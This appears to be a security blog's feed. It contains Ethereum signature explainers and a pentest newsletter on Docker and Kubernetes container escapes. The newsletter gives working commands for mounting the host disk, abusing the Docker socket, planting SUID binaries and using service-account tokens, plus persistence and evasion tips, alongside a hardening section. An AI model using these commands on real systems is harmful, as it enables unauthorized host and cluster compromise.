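Off-chain code has to build exactly this preimage before hashing. A sketch of the construction step (the keccak-256 hash itself needs a library such as ethers, omitted here to keep the snippet dependency-free):

```javascript
// Build the exact EIP-191 "personal message" preimage that wallets hash:
// "\x19Ethereum Signed Message:\n" + length + message.
// Note: the length is the UTF-8 *byte* length, not the character count.
function personalMessagePreimage(message) {
  const body = Buffer.from(message, 'utf8');
  const prefix = Buffer.from(`\x19Ethereum Signed Message:\n${body.length}`, 'utf8');
  return Buffer.concat([prefix, body]);
}

// keccak256(personalMessagePreimage(msg)) is the hash ecrecover must receive.
```

If the byte length in the prefix is wrong (a classic bug with multi-byte UTF-8 messages), the contract hashes a different preimage than the wallet signed and verification silently fails.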

## Key Takeaways

### 1. Different Encoding Schemes

| Aspect | Transaction Signatures | Message Signatures |
|--------|----------------------|-------------------|
| **Encoding** | RLP (Recursive Length Prefix) | EIP-191 prefix variants |
| **Structure** | `RLP([nonce, gasPrice, ...])` | `0x19 &lt;version&gt; &lt;data&gt;` |
| **Hash Input** | RLP-encoded transaction | Prefixed message |
| **Built-in Fields** | nonce, chainId, gas parameters | Version byte only |
| **Standardization** | Yellow Paper (Appendix B) | [EIP-191](https://eips.ethereum.org/EIPS/eip-191) |

### 2. RLP vs EIP-191: Know What Gets Signed

**RLP** serializes complex data structures into deterministic byte arrays. Every Ethereum node uses identical RLP encoding, ensuring signatures are bound to exact transaction parameters. RLP is mandatory for transactions.
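For intuition, the short-string case of RLP is small enough to sketch (assumption: byte strings up to 55 bytes only; lists and long strings need the full spec in the Yellow Paper, Appendix B):

```javascript
// Minimal RLP encoder for short byte strings: a single byte in
// [0x00, 0x7f] encodes as itself; anything else gets a 0x80+length prefix.
function rlpEncodeBytes(buf) {
  if (buf.length === 1) {
    if ((buf[0] >> 7) === 0) return buf; // byte below 0x80: its own encoding
  }
  if (buf.length > 55) throw new Error('long-string form not implemented');
  return Buffer.concat([Buffer.from([0x80 + buf.length]), buf]);
}

console.log(rlpEncodeBytes(Buffer.from('dog'))); // 0x83 'd' 'o' 'g'
```

The determinism is the point: every node serializes the same transaction fields to the same bytes, so a signature over the RLP encoding binds the signer to those exact fields.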

**EIP-191** provides domain separation through version bytes. The `0x19` prefix ensures signed messages cannot be mistaken for RLP-encoded transactions. The version byte (`0x00`, `0x01`, `0x45`) specifies the data structure and intended use.

### 3. Manual Verification Requires Manual Security

Transaction signatures are verified automatically by every network node. Message signatures require explicit verification logic in smart contracts or backend systems.

This means:
- You must implement replay protection (nonces, expiries, or single-use flags)
- You must validate `ecrecover` return values (check for `address(0)`)
- You must reconstruct the exact prefix format wallets use
- You must handle signature malleability and edge cases

Use [OpenZeppelin&apos;s ECDSA library](https://docs.openzeppelin.com/contracts/4.x/api/utils#ECDSA) instead of rolling your own. It handles these gotchas correctly.

### 4. Security Checklist

When implementing message signature verification:

- **Always** reconstruct the EIP-191 prefix exactly as wallets create it
- **Always** check `ecrecover` return value against `address(0)`
- **Always** implement replay protection (nonces or used signature tracking)
- **Always** validate signature length (must be exactly 65 bytes)
- **Always** normalize `v` to 27 or 28 (some libraries use 0/1)
- **Never** trust signatures without comparing recovered address to expected address
- **Never** skip expiry checks if time-sensitive
- **Never** assume users understand what they&apos;re signing
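The length and `v` items are mechanical enough to sketch. An illustrative parsing helper (not from any particular library):

```javascript
// Split a 65-byte signature into r, s, v, validating length and
// normalizing v to the 27/28 convention that ecrecover expects.
function parseSignature(sigHex) {
  const sig = Buffer.from(sigHex.replace(/^0x/, ''), 'hex');
  if (sig.length !== 65) throw new Error('signature must be exactly 65 bytes');
  const r = sig.subarray(0, 32);
  const s = sig.subarray(32, 64);
  let v = sig[64];
  if (v === 0 || v === 1) v += 27; // some libraries emit the raw recovery id
  if (!(v === 27 || v === 28)) throw new Error('invalid v value');
  return { r, s, v };
}
```

OpenZeppelin&apos;s ECDSA library performs these checks (plus the s-value malleability check) for you, which is why rolling your own parser is rarely worth it.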

### 5. Users Cannot Distinguish Signatures

To users, both signature types look like cryptographic hex strings in a wallet popup. One might drain their wallet, the other might just log them in. They can&apos;t tell the difference.

This means:
- Make signed messages as clear as possible (&quot;Authorize withdrawal of 100 USDC&quot;)
- Include amounts, recipients, and actions explicitly in the message text
- Never hide important information in calldata or structured fields users can&apos;t read
- Consider using [EIP-712](https://eips.ethereum.org/EIPS/eip-712) for structured data.

## What&apos;s Next: Meta-Transactions and Gasless Execution

You now understand the two fundamental signature types. Transaction signatures operate on-chain with automatic verification. Message signatures operate off-chain with manual verification and no built-in replay protection.

Next, we combine them.

**Meta-transactions** use message signatures to authorize actions that relayers execute as on-chain transactions. Users sign messages (free), relayers submit transactions (pay gas). This enables gasless onboarding, sponsored transactions, and improved UX.

But meta-transactions introduce new attack surfaces:
- Signature replay across different relayers
- Front-running and MEV exploitation
- Nonce desynchronization between user and relayer
- Relayer trust assumptions
- Cross-chain and cross-contract replay attacks

In the next post, we&apos;ll dissect:
- How meta-transaction systems work architecturally
- The [EIP-2771](https://eips.ethereum.org/EIPS/eip-2771) trusted forwarder standard
- Real implementations (OpenZeppelin MinimalForwarder, Biconomy, GSN)
- Attack patterns specific to gasless systems
- How to build secure meta-transaction contracts

If you thought message signatures were complex, meta-transactions are where things get truly interesting. And by interesting, I mean exploitable.

## Additional Resources

### Ethereum Standards
- **[EIP-191: Signed Data Standard](https://eips.ethereum.org/EIPS/eip-191)** - Complete specification for all signature version bytes
- **[EIP-155: Simple Replay Attack Protection](https://eips.ethereum.org/EIPS/eip-155)** - ChainId inclusion in transaction signatures
- **[Ethereum Yellow Paper, Appendix B](https://ethereum.github.io/yellowpaper/paper.pdf)** - RLP encoding specification
- **[Ethereum.org RLP Documentation](https://ethereum.org/en/developers/docs/data-structures-and-encoding/rlp/)** - Accessible RLP explanation with examples

### Security Resources
- **[OpenZeppelin ECDSA Library](https://docs.openzeppelin.com/contracts/4.x/api/utils#ECDSA)** - Production-ready signature verification implementation
- **[Solidity Documentation: ecrecover](https://docs.soliditylang.org/en/latest/units-and-global-variables.html)** - Official documentation for the ecrecover precompile
- **[Trail of Bits: ECDSA Handle With Care](https://blog.trailofbits.com/2020/06/11/ecdsa-handle-with-care/)** - Common signature verification pitfalls</content:encoded><author>Ruben Santos</author></item><item><title>Docker Escape: Breaking Out of Containers</title><link>https://www.kayssel.com/newsletter/issue-23</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-23</guid><description>From misconfigured containers to full host compromise: a practical guide to container breakout techniques</description><pubDate>Sun, 09 Nov 2025 10:00:00 GMT</pubDate><content:encoded>Hey everyone,

This summer I did something I&apos;ve been meaning to do for a while: I actually sat down and learned Docker security properly. Not just the basics you pick up from running `docker run` in pentests, but really understanding how containers work under the hood and where they break.

The motivation? I wanted to build [Valeris](https://github.com/rsgbengi/valeris), a Rust-based security scanner for Docker containers. I&apos;ve been documenting the whole process in my [Docker Security series](https://www.kayssel.com/series/docker-security/), and it&apos;s been one of the most rewarding learning projects I&apos;ve done this year.

But here&apos;s the thing: once you understand how containers actually isolate processes (spoiler: they don&apos;t, not really), you start seeing escape paths everywhere. Privileged mode. Docker socket exposure. Kernel exploits. Kubernetes service account tokens. The list goes on.

Containers aren&apos;t virtual machines. They&apos;re just processes with fancy kernel tricks applied. And when those tricks fail, or when someone misconfigures them, breaking out is surprisingly straightforward.

So I wanted to take what I&apos;ve learned this summer and condense it into a practical guide. This newsletter covers the most common container escape techniques: what to look for when you land inside a container, how to exploit misconfigurations, and why these issues keep showing up in production environments.

If you want the deep dive on how Docker isolation works (namespaces, cgroups, and all that), check out [Chapter 1 of the Docker Security series](https://www.kayssel.com/post/docker-security-1/). For privilege escalation with root containers and mounted directories, [Chapter 2](https://www.kayssel.com/post/docker-security-2/) has you covered.

This newsletter focuses on the bigger picture: all the ways containers fail to be secure boundaries.

## How Containers Actually Work (The 30-Second Version)

Containers aren&apos;t VMs. They&apos;re just Linux processes isolated using **namespaces** (what a process can see) and **cgroups** (what it can use). No hypervisor. No separate kernel. Just kernel tricks.

When those tricks fail or get disabled, you&apos;re running on the host.

For the full technical breakdown, read [Docker Security Chapter 1](https://www.kayssel.com/post/docker-security-1/). For now, just know: containers share the host kernel, and that&apos;s both the performance win and the security risk.
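The sharing is easy to see from any Linux shell; this sketch only reads `/proc`, so it is safe to run anywhere (container or host):

```bash
# Each namespace a process belongs to is a symlink under /proc/self/ns.
# Two processes share a namespace exactly when the inode numbers match.
ls -la /proc/self/ns

# The kernel itself is NOT namespaced: inside a container, uname reports
# the host kernel version.
uname -r
```

Compare the `ns` inodes of a container process and a host process and you can map out precisely which isolation layers are in effect.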

## Why Container Escapes Matter

When you compromise a containerized application, you&apos;re not done. You&apos;re stuck in a sandbox with limited access to the actual system.

**What you can&apos;t see from inside a container:**
- Other containers running on the host
- Host filesystem (unless explicitly mounted)
- Host network interfaces (unless using host networking)
- Real process tree on the host
- Kernel modules and configuration

**But if you escape, you get:**
- Full root access to the host system
- Access to all other containers
- Cloud metadata credentials (AWS, Azure, GCP)
- Secrets, environment variables from other apps
- Ability to persist and pivot across the infrastructure

Container escapes turn limited RCE into full infrastructure compromise.

## Detecting You&apos;re in a Container

First, figure out if you&apos;re even in a container. Here are the signs:

&lt;details&gt;
&lt;summary&gt;Check for .dockerenv file:&lt;/summary&gt;

```bash
ls -la / | grep dockerenv
```

If `/.dockerenv` exists, you&apos;re in Docker.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;Check cgroup entries:&lt;/summary&gt;

```bash
cat /proc/1/cgroup
```

If you see `docker` or `kubepods` in the output, you&apos;re containerized.
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;Check for container-specific environment variables:&lt;/summary&gt;

```bash
env | grep -i kube
env | grep -i docker
```
&lt;/details&gt;

&lt;details&gt;
&lt;summary&gt;Sparse filesystem:&lt;/summary&gt;

```bash
ls /home  # Often empty in containers
df -h     # Small, minimal filesystems
```
&lt;/details&gt;

Once you confirm you&apos;re in a container, start looking for escape paths.

## Privileged Containers: The Easy Win

Running a container with `--privileged` is the container escape equivalent of giving an attacker a gift-wrapped root shell.

**What --privileged does:**
- Disables all security restrictions
- Gives container access to all host devices
- Allows mounting the host filesystem
- Basically removes all isolation

&lt;details&gt;
&lt;summary&gt;Check if you&apos;re in a privileged container:&lt;/summary&gt;

```bash
ip link add dummy0 type dummy
```

If this succeeds, you&apos;re privileged. Non-privileged containers can&apos;t create network interfaces.
&lt;/details&gt;

### Exploiting Privileged Containers

If you&apos;re privileged, escape is trivial. Mount the host filesystem and chroot into it:

```bash
# List available disks
fdisk -l

# Create mount point
mkdir /mnt/host

# Mount the host root filesystem
mount /dev/sda1 /mnt/host

# Chroot into it
chroot /mnt/host bash

# You&apos;re now root on the host
id
```

From here, you can:
- Add SSH keys to `/root/.ssh/authorized_keys`
- Modify `/etc/passwd` or `/etc/shadow`
- Install backdoors
- Access secrets from other containers

**Pro tip:** If you want persistence, add a cron job or systemd service on the host that phones home.

## Exploiting Excessive Capabilities

Even if the container isn&apos;t fully privileged, it might have dangerous Linux capabilities enabled.

Linux capabilities split root privileges into distinct units. Containers often get more capabilities than they need.

&lt;details&gt;
&lt;summary&gt;Check your capabilities:&lt;/summary&gt;

```bash
capsh --print
```

Or:

```bash
cat /proc/self/status | grep Cap
```
&lt;/details&gt;

### CAP_SYS_ADMIN: Almost as Good as Privileged

`CAP_SYS_ADMIN` is a catch-all capability that allows mounting filesystems, among other things.

If you have it, you can mount the host filesystem:

```bash
# Check if CAP_SYS_ADMIN is set
capsh --print | grep sys_admin

# If yes, mount host filesystem
mkdir /mnt/host
mount -t ext4 /dev/sda1 /mnt/host
chroot /mnt/host bash
```

### CAP_SYS_PTRACE: Inject into Host Processes

`CAP_SYS_PTRACE` lets you attach to and manipulate processes. If you can see host processes (rare but possible), you can inject shellcode.

### CAP_DAC_READ_SEARCH: Read Any File

Bypasses file read permission checks. Combined with knowledge of where secrets are stored, you can exfiltrate sensitive data.

**Defense note:** Only grant the minimum required capabilities. Most apps don&apos;t need any beyond the default set.

## Docker Socket Exposure: The Ultimate Backdoor

Some developers mount the Docker socket (`/var/run/docker.sock`) into containers to allow them to manage other containers. This is catastrophic.

&lt;details&gt;
&lt;summary&gt;Check if the Docker socket is mounted:&lt;/summary&gt;

```bash
ls -la /var/run/docker.sock
```

If it exists and is writable, you can control Docker on the host.
&lt;/details&gt;

### Exploiting Docker Socket Access

If you have access to the socket, you can spawn a new privileged container with the host filesystem mounted:

```bash
# Check docker version
docker version

# Spawn a new privileged container with host root mounted
docker run -v /:/host -it alpine chroot /host bash
```

You&apos;re now root on the host.

**Alternative if `docker` binary isn&apos;t available:**

```bash
# Install Docker client in the container first
apk add docker  # Alpine
# or
apt-get update &amp;&amp; apt-get install -y docker.io  # Debian/Ubuntu

# Then run the escape
docker run -v /:/host -it alpine chroot /host bash
```

If you can&apos;t install Docker, use `curl` to interact with the socket directly:

```bash
# List containers via Docker API
curl --unix-socket /var/run/docker.sock http://localhost/containers/json

# Create a privileged container
curl --unix-socket /var/run/docker.sock -X POST \
  -H &quot;Content-Type: application/json&quot; \
  -d &apos;{&quot;Image&quot;:&quot;alpine&quot;,&quot;Cmd&quot;:[&quot;/bin/sh&quot;],&quot;HostConfig&quot;:{&quot;Binds&quot;:[&quot;/:/host&quot;],&quot;Privileged&quot;:true}}&apos; \
  http://localhost/containers/create

# Start it with the Id returned by the create call (attaching needs a
# stream-hijacking client; simpler to make the Cmd a reverse shell)
curl --unix-socket /var/run/docker.sock -X POST \
  http://localhost/containers/&lt;container_id&gt;/start
```

Docker socket exposure is a common misconfiguration in CI/CD pipelines, developer tooling, and monitoring containers.

## Exploiting Host Path Mounts

Containers often have host directories mounted for logs, configs, or shared data. If you&apos;re root in the container and a sensitive directory is mounted with write access, you can modify files on the host.

**Classic example: SUID binaries**

If any host directory is mounted writable (at `/mnt` in this example), drop a SUID `bash` binary into it:

```bash
cp /bin/bash /mnt/bash
chown root:root /mnt/bash
chmod 4777 /mnt/bash
```

From the host, run `./bash -p` and you&apos;re root.
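The leading `4` in `4777` is the setuid bit. A harmless local sketch of what it looks like (no root needed to set the bit on a file you own; the escalation only works because the copy on the host mount is owned by root):

```bash
# Mode 4755 = setuid bit + rwxr-xr-x. A setuid executable runs with the
# *owner's* uid, which is why a root-owned SUID bash hands out root shells.
f=$(mktemp)
chmod 4755 "$f"
stat -c '%A' "$f"   # -rwsr-xr-x : the 's' in place of the owner 'x' is setuid
rm -f "$f"
```

When hunting on a host, `find / -perm -4000 -type f 2>/dev/null` lists every SUID binary, including any an attacker planted through a mount.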

**Other targets:**
- `/etc` mounted? Add cron jobs or modify `/etc/passwd`
- `/root` mounted? Drop SSH keys
- Application directories? Backdoor startup scripts

For a detailed walkthrough of this technique with practical examples, check out [Docker Security Chapter 2](https://www.kayssel.com/post/docker-security-2/) where I demonstrate the full attack chain.

## Kernel Exploits from Containers

Containers share the host kernel. If the kernel is vulnerable, you can exploit it from inside the container to break out.

**Recent examples:**

- **[CVE-2022-0847 (Dirty Pipe)](https://nvd.nist.gov/vuln/detail/CVE-2022-0847)** – Flaw in the Linux kernel pipe buffer structure allowing unprivileged users to write to read-only pages in the page cache. Affects kernel versions 5.8 through 5.16.11. While exploitation requires local access, containers with elevated privileges can leverage this for escape. CVSS: 7.8 (HIGH).

- **[CVE-2022-0185](https://nvd.nist.gov/vuln/detail/CVE-2022-0185)** – Heap-based buffer overflow in the `legacy_parse_param` function in Linux kernel&apos;s Filesystem Context. Affects kernel versions 5.1 through 5.16. Exploitable for privilege escalation and container escape. Listed in CISA&apos;s Known Exploited Vulnerabilities Catalog. CVSS: 8.4 (HIGH).

- **[CVE-2021-22555](https://nvd.nist.gov/vuln/detail/CVE-2021-22555)** – Heap out-of-bounds write in net/netfilter/x_tables.c affecting Linux since v2.6.19. Used for container escapes in the wild through heap memory corruption. Added to CISA&apos;s KEV Catalog. CVSS: 7.8 (HIGH).

&lt;details&gt;
&lt;summary&gt;Check kernel version:&lt;/summary&gt;

```bash
uname -r
```

Then search for exploits matching that version.
&lt;/details&gt;

Tools like **[linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)** can help identify kernel vulnerabilities:

```bash
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh
```

If you find a viable kernel exploit, compile and run it. Successful exploitation often gives you root on the host.

**Note:** Kernel exploits can crash the system. Use them carefully in production environments, and think twice when a crash would tip off defenders.

## Kubernetes-Specific Escapes

If you&apos;re in a Kubernetes pod, you have additional escape vectors.

### Service Account Tokens

By default, Kubernetes mounts a service account token into every pod at `/var/run/secrets/kubernetes.io/serviceaccount/token`.

&lt;details&gt;
&lt;summary&gt;Check for service account token:&lt;/summary&gt;

```bash
ls /var/run/secrets/kubernetes.io/serviceaccount/
cat /var/run/secrets/kubernetes.io/serviceaccount/token
```
&lt;/details&gt;
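The token is a standard JWT, so you can read its claims (namespace, service account name, expiry) before touching the API. A small helper, assuming the usual three base64url segments:

```bash
# Print the claims payload (second dot-separated segment) of a JWT.
# base64url omits '=' padding and swaps two characters, so restore both
# before piping to base64 -d.
jwt_payload() {
  seg=$(printf '%s' "$1" | cut -d. -f2 | tr '_-' '/+')
  while [ $(( ${#seg} % 4 )) -ne 0 ]; do seg="${seg}="; done
  printf '%s' "$seg" | base64 -d
}

# Against a live pod (default mount path):
# jwt_payload "$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)"
```

The `kubernetes.io/serviceaccount/namespace` and `sub` claims tell you which namespace and identity you are operating as before you make a single noisy API call.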

With this token, you can interact with the Kubernetes API:

```bash
# Get API server URL
APISERVER=https://kubernetes.default.svc
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)

# List pods in current namespace
curl -k -H &quot;Authorization: Bearer $TOKEN&quot; $APISERVER/api/v1/namespaces/default/pods

# If you have permissions, create a privileged pod
curl -k -H &quot;Authorization: Bearer $TOKEN&quot; -X POST \
  -H &quot;Content-Type: application/json&quot; \
  -d @privileged-pod.json \
  $APISERVER/api/v1/namespaces/default/pods
```

If the service account has cluster-admin or elevated permissions, you can create a privileged pod with host mounts and escape.

### Kubernetes Node Access

Some Kubernetes pods run with `hostNetwork: true`, `hostPID: true`, or `hostIPC: true`. These settings give you access to the node&apos;s network, process tree, or IPC namespace.

If `hostPID` is enabled, you can see all processes on the node:

```bash
ps aux
```

Look for processes running on the host. If you see SSH, Docker, or kubelet, you might be able to interact with them.

If `hostNetwork` is enabled, you can access internal services that are normally firewalled from pods.

## Tools for Container Escapes

**[CDK (Container Detection Kit)](https://github.com/cdk-team/CDK)** – All-in-one tool for container enumeration and escape. Supports Docker, Kubernetes, and various misconfigurations.

```bash
./cdk evaluate
./cdk run cap-dac-read-search
./cdk run mount-disk
```

**[deepce](https://github.com/stealthcopter/deepce)** – Docker enumeration and escape tool. Checks for common misconfigurations automatically.

```bash
./deepce.sh
```

**[amicontained](https://github.com/genuinetools/amicontained)** – Detects container runtime and checks capabilities.

```bash
amicontained
```

**[botb (Break Out The Box)](https://github.com/brompwnie/botb)** – Container escape analysis and exploitation tool.

**[kubectl](https://kubernetes.io/docs/reference/kubectl/)** – If you&apos;re in a Kubernetes pod with sufficient permissions, `kubectl` is your best friend for interacting with the cluster.

## Defense and Detection

If you&apos;re defending containerized infrastructure, here&apos;s what actually works:

**Don&apos;t Run Privileged Containers** – Ever. There&apos;s almost never a good reason. If you think you need it, you probably don&apos;t.

**Drop Unnecessary Capabilities** – Use `--cap-drop=ALL` and only add what&apos;s required:

```bash
docker run --cap-drop=ALL --cap-add=NET_BIND_SERVICE myapp
```

**Don&apos;t Mount the Docker Socket** – Seriously. If a container needs to manage Docker, use a dedicated orchestration tool like Kubernetes or a secure API proxy.

**Use User Namespaces** – Map container root to an unprivileged user on the host:

```bash
dockerd --userns-remap=default
```

**Read-Only Filesystems** – Mount container filesystems as read-only where possible:

```bash
docker run --read-only myapp
```

**Seccomp and AppArmor Profiles** – Restrict system calls and actions the container can perform. Docker has default profiles; customize them for your app.

**Runtime Security Monitoring** – Tools like **Falco** and **Sysdig** detect abnormal container behavior (process execution, file access, network connections).

**Regular Kernel Updates** – Since containers share the host kernel, keep it patched. Subscribe to kernel security mailing lists.

**Least Privilege for Kubernetes Service Accounts** – Don&apos;t give pods unnecessary RBAC permissions. Default service accounts should have minimal access.

**Network Policies** – In Kubernetes, use network policies to restrict pod-to-pod and pod-to-internet traffic.

## Where to Practice

**TryHackMe – Containers &amp; Kubernetes Rooms:**
- [The Docker Rodeo](https://tryhackme.com/room/dockerrodeo) – Container escape challenges
- [Kubernetes for Everyone](https://tryhackme.com/room/kubernetesforyouly) – Kubernetes security basics

**Hack The Box Machines:**
- **Carpediem** – Container escape via CVE-2022-0492 (cgroup release_agent vulnerability)
- **Opensource** – Container enumeration and Git hooks exploitation
- **MonitorsTwo** – Docker container escape and privilege escalation
- **Ready** – GitLab exploitation and Docker container breakout

**HackTricks – Docker Security:**
[https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/](https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/)

Comprehensive guide covering Docker escapes, misconfigurations, and privilege escalation techniques including privileged containers, Docker socket abuse, and sensitive mounts.

**Your Own Lab:**
Spin up a local Docker environment and practice:
1. Create a privileged container and mount the host filesystem
2. Run a container with excessive capabilities and exploit them
3. Mount `/var/run/docker.sock` and spawn a new privileged container
4. Simulate kernel exploits (in a VM, not on your main system)

## Wrapping Up

Containers are not a security boundary. They&apos;re a convenience layer for packaging and deploying applications. The isolation they provide is useful for preventing accidents, not attacks.

When you land inside a container during a pentest, don&apos;t stop there. Enumerate your environment. Check for privileged mode, excessive capabilities, mounted Docker socket, or writable host paths. Look for Kubernetes service account tokens. Check the kernel version.

One misconfiguration and you&apos;re out. And once you&apos;re out, the entire host and potentially the entire cluster is yours.

## Building Valeris and the Docker Security Series

This whole newsletter came out of a summer spent deep in Docker internals. I wanted to build a practical tool ([Valeris](https://github.com/rsgbengi/valeris)) that could catch these misconfigurations before they turn into incidents.

The tool is still in development, but it&apos;s already functional. It scans running containers for common issues like root users, dangerous mounts, and exposed capabilities. All using YAML-based rules that you can customize without recompiling.

If you want to follow along with the development or dive deeper into container security:

- **[Docker Security Series](https://www.kayssel.com/series/docker-security/)** – Full technical breakdown with hands-on examples
- **[Valeris on GitHub](https://github.com/rsgbengi/valeris)** – The tool itself, contributions welcome
- **[Chapter 1: How Docker Works](https://www.kayssel.com/post/docker-security-1/)** – Namespaces, cgroups, OverlayFS explained
- **[Chapter 2: Privilege Escalation](https://www.kayssel.com/post/docker-security-2/)** – Root containers, SUID attacks, `/proc/&lt;PID&gt;/root` exploitation

Building this tool has been one of the best learning experiences I&apos;ve had this year. It forced me to understand not just how to exploit containers, but how to detect those exploits programmatically. And honestly, that&apos;s where the real learning happens.

So next time you pop a shell and see `/.dockerenv`, don&apos;t groan. Smile. Because you&apos;re about to learn something new about how the infrastructure is configured, and there&apos;s a good chance you&apos;re going to find a way out.

Thanks for reading, and happy escaping.

Ruben</content:encoded><category>Newsletter</category><category>cloud-security</category><author>Ruben Santos</author></item><item><title>Understanding Ethereum Signatures - The Foundation of Web3 Security</title><link>https://www.kayssel.com/post/web3-19</link><guid isPermaLink="true">https://www.kayssel.com/post/web3-19</guid><description>Deep dive into Ethereum&apos;s cryptographic signature system, ECDSA, secp256k1, signature anatomy (r, s, v), and practical examples of signing, verifying, and securing Web3 authentication flows.</description><pubDate>Wed, 05 Nov 2025 09:00:00 GMT</pubDate><content:encoded>## A Personal Note

I&apos;ve been diving deep into Web3 security lately, and one thing keeps coming up in every exploit, every vulnerability, every attack vector. Signatures. They&apos;re the foundation of everything in this space, yet most developers (myself included, until recently) don&apos;t truly understand how they work under the hood.

So I decided to write a series of articles exploring signatures from every angle. How they work, how they break, and how to defend against attacks. This is the first of six posts where we&apos;ll go from fundamentals to advanced exploitation techniques.

If you&apos;ve ever wondered why a simple &quot;sign to login&quot; can drain your wallet, or how attackers bypass security measures, you&apos;re in the right place. Let&apos;s start at the beginning.

## Introduction

Picture this. You walk into a bank, no ID required. No password. No security questions about your first pet&apos;s name. Instead, you pull out a small mathematical proof, something only you could have created, and the bank instantly knows you&apos;re you. No questions asked. No database to hack. No server to breach.

Sound like science fiction? Welcome to Web3.

Here&apos;s the thing about traditional web security. It&apos;s all about *who you know*. Servers, databases, session tokens, they all conspire to remember you. But what happens when that server gets hacked? Ask the 3 billion Yahoo accounts that were compromised. Ask LinkedIn&apos;s 165 million users. The list goes on.

Web3 doesn&apos;t play that game. In this world, **you are your signature**. Not your email. Not your username. Your cryptographic signature is the single source of truth about your identity. There&apos;s no Google or Facebook acting as a middleman. No central authority deciding if you&apos;re really you.

But here&apos;s where it gets interesting and dangerous.

Every transaction you send, every NFT you mint, every smart contract you interact with gets signed with your private key. And if someone gets that key? Game over. No password reset email. No customer support hotline. Your funds are gone, and there&apos;s no undo button.

Think about that for a second. In traditional finance, you can call your bank, freeze your card, dispute a charge. In Web3, your private key is your bank, your vault, and your identity rolled into one. Lose it or expose it, and you&apos;re done.

**So why should you care about signatures?**

Because understanding how these signatures work isn&apos;t just about building dApps or passing a security audit. It&apos;s about understanding the single point of failure that makes or breaks Web3 security. It&apos;s about knowing:

- Why a simple &quot;Sign this message to login&quot; can drain your wallet
- How attackers trick you into signing away your assets
- What actually happens when MetaMask asks you to approve a transaction
- The difference between a signature that proves ownership and one that authorizes theft

Let me be blunt. Every Web3 exploit you&apos;ve read about (the $600M Poly Network hack, the countless phishing attacks, the endless rug pulls) all come down to one thing. **Someone signed something they shouldn&apos;t have**.

Ready to understand the foundation of Web3 security? Let&apos;s dive in.

## Cryptographic Foundations (The Math That Protects Your Money)

### ECDSA and secp256k1 (Your Digital DNA)

You know how you can scramble an egg but can&apos;t unscramble it? That&apos;s the basic idea behind Ethereum&apos;s signature system.

Ethereum uses something called [**ECDSA**](https://en.wikipedia.org/wiki/Elliptic_Curve_Digital_Signature_Algorithm) (Elliptic Curve Digital Signature Algorithm) with the [**secp256k1**](https://en.bitcoin.it/wiki/Secp256k1) curve. Bitcoin uses the exact same system. If that sounds intimidating, don&apos;t worry. The concept is beautifully simple.

Think of it like this. Imagine a magical machine with one door in and one door out. You put a number in the entrance, the machine does some complex math, and out comes a completely different number. Easy, right?

Here&apos;s the magic part. **You cannot go backwards**. Ever. No matter how powerful your computer, no matter how much time you have, you cannot reverse the process. It&apos;s mathematically impossible.

**The journey from private key to your address looks like this**

```
Private Key (256-bit random number)
    ↓ (Elliptic Curve multiplication - one-way function)
Public Key (x,y coordinates on the curve)
    ↓ (Keccak-256 hash + take last 20 bytes)
Ethereum Address (0x...)
```

Let me break this down in human terms.

**Your Private Key** is a 256-bit random number. Think of it as a 32-byte secret, essentially a really, *really* long password. But unlike passwords you create, this one is truly random. So random that the odds of someone generating the same one are smaller than finding a specific grain of sand on all the beaches on Earth. Never share this. Never transmit it. This is your key to everything.

**Your Public Key** gets derived from your private key using elliptic curve mathematics. It&apos;s 64 bytes long. Here&apos;s the beautiful part. Anyone can see your public key, but they can never work backwards to find your private key. The math simply doesn&apos;t allow it.

**Your Ethereum Address** comes from taking that public key, running it through a [Keccak-256](https://en.wikipedia.org/wiki/SHA-3) hash function (we&apos;ll get to that), grabbing the last 20 bytes, slapping a `0x` in front, and boom. That&apos;s your wallet address. The one you share with everyone. The one on your Twitter profile.

The security here relies on something called the **Elliptic Curve Discrete Logarithm Problem** ([ECDLP](https://en.wikipedia.org/wiki/Discrete_logarithm)). Fancy name for a simple concept. Given a public key, it&apos;s computationally impossible to figure out the private key that created it.

How impossible? Let&apos;s put it this way. If you started trying to crack a single private key today, using all the computing power currently on Earth, the universe would end before you succeeded. That&apos;s not an exaggeration. That&apos;s math.

### Keccak-256 (The Blender That Can&apos;t Be Un-Blended)

Now let&apos;s talk about the hash function Ethereum uses. **Keccak-256**.

Think of a hash function like a super-powered blender. You throw in ingredients (your data), hit the button, and out comes a smoothie (the hash). But here&apos;s the thing: you can never separate that smoothie back into its original ingredients. Strawberries, bananas, spinach, once blended, they&apos;re gone forever. All you have is the smoothie.

That&apos;s what Keccak-256 does to your data. It takes any input, could be a message, could be your public key, could be an entire transaction, and spits out a unique 256-bit (32-byte) fingerprint.

Here&apos;s what makes it special:
- **Same input always produces the same output**. Blend the same ingredients, get the same smoothie
- **Different inputs produce wildly different outputs**. Change one letter in your message, and the hash is completely unrecognizable
- **One-way only**. You can&apos;t reverse it. Ever.

```javascript
// Example. Generating an Ethereum address from a public key
const { keccak256 } = require(&apos;ethers&apos;);

// Public key (64 bytes, uncompressed, without 0x04 prefix)
const publicKey = &quot;0x1234...&quot;; // Your full public key here

// Hash and take last 20 bytes
const address = &quot;0x&quot; + keccak256(publicKey).slice(-40);
```

**Quick reality check. Why does Ethereum use Keccak-256 and not SHA-256 like Bitcoin?**

Because when Ethereum was being designed in 2014, [Keccak had just won the SHA-3 competition](https://www.nist.gov/news-events/news/2012/10/nist-selects-winner-secure-hash-algorithm-sha-3-competition) but hadn&apos;t been standardized yet. Ethereum adopted the original Keccak algorithm, while the final [SHA-3 standard](https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.202.pdf) made some tweaks. So technically, Ethereum uses Keccak-256, not SHA3-256. They&apos;re cousins, not twins.

Why does this matter for you as a security researcher? Because if you&apos;re verifying signatures or reproducing exploits, using the wrong hash function will break everything. Always use Keccak-256 for Ethereum work.

![](/content/images/2025/10/ethr_addr_creation.png)

*Diagram. The derivation flow from Private Key to Ethereum Address - note the one-way nature of each step*

## Ethereum Signature Anatomy. Breaking Down Your Digital Signature

